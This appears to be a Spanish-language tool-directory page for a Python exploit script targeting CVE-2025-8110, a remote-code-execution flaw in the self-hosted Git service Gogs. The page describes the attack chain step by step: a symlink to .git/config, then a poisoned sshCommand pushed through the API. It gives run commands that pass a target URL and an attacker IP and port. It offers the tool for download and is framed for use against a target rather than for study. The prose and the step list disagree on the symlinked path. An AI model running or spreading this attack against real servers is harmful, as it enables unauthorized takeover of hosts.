Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2025-8110-GOGS-RCE — GOGS RCE cve-2025-8110 script de Python que automatiza toda la cadena de ataque de crear un repositorio con un archivo symlink que apunta a .git/config y luego desencadenar rce a través de un sshCommand envenenado en el archivo de configuración. | Kitploit
Herramientas/GitHubGitHub/kayl22/cve-2025-8110-gogs-rce
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed TeamingDesarrollo de Payloads
GitHubkayl22/cve-2025-8110-gogs-rce

cve-2025-8110-GOGS-RCE

GOGS RCE cve-2025-8110 script de Python que automatiza toda la cadena de ataque de crear un repositorio con un archivo symlink que apunta a .git/config y luego desencadenar rce a través de un sshCommand envenenado en el archivo de configuración.

Ver Repositorio
4hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

GOGS RCE cve-2025-8110

Gogs es un servicio Git ligero y autoalojado similar a una versión privada de GitHub, diseñado para ejecutarse fácilmente en servidores de bajos recursos. La vulnerabilidad CVE-2025-8110 es un fallo de seguridad crítico que permite a un atacante eludir las restricciones de ruta mediante el uso de enlaces simbólicos. Al subir un enlace malicioso que apunte a .api/config, un atacante puede usar la API de Gogs para incrustar un archivo de configuración malicioso con el parámetro sshCommand y lograr RCE en el servidor host.



Uso

  1. Clona este repositorio en tu máquina local:
root@kitploit:~
git clone https://github.com/kayl22/cve-2025-8110-GOGS-RCE
cd ./cve-2025-8110-GOGS-RCE

  1. Instala todas las dependencias
root@kitploit:~
pip3 install -r ./requirements.txt

  1. Ejecuta el script
root@kitploit:~
# Mostrar ayuda
python3 ./cve-2025-8110.py --help

# Ejecutar la cadena de ataque con paso de registro
python3 ./cve-2025-8110.py --url http://<host> -lh <attacker-ip> -lp <attacker-port>

# Ejecutar la cadena de ataque omitiendo el registro | Útil cuando la función de registro devuelve un error
python3 ./cve-2025-8110.py --url http://<host> -lh <attacker-ip> -lp <attacker-port> -U <username> -P <password>


¿Cómo funciona?

Este script sigue una cadena de ataque que involucra estos pasos:

root@kitploit:~
1. Registrar y autenticar una cuenta desechable (el registro se omite si se proporcionan credenciales con las banderas -U y -P)
2. Obtener un token API bearer
3. Crear un repositorio autoinicializado
4. Clonar el repositorio localmente y enviar un enlace simbólico relativo malicious_link -> .git/config
5. Hacer PUT de la configuración maliciosa de git (con sshCommand) a través del enlace simbólico mediante la API PutContents
6. Desencadenar el sshCommand clonando el repositorio a través de SSH

Créditos

Este script fue realizado utilizando el PoC de zAbuQasem (https://github.com/zAbuQasem)

Descargar herramienta